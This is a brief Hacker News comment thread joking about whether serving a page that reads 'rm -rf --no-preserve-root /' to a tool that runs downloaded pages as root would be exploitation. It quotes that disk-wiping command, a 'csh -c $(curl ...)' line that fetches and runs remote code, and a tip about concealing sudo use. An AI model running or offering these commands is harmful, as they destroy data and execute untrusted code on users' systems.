Hacker News new | ask | show | jobs
by _def 2023 days ago
> If someone made an application that downloaded web pages and executed the contents with SUDO privileges, would I be exploiting someone if my website was 'rm -rf --no-preserve-root /'?

Yes.
3 comments
KingMachiavelli 2023 days ago
I'll take that bet. Whatever you do don't run this!

> csh -c $(curl dev.sansorgan.es)

(I specified csh as anyone willing to try this probably wouldn't have it installed).

link
LinuxBender 2023 days ago
Remember to test with

  sudo -n
You don't want to give away that you are using sudo to anyone that does not first read the script.
link
h_anna_h 2023 days ago
Guess your post is exploiting these that run a script that executes random commands that they find online with root privileges. Better pay up.
link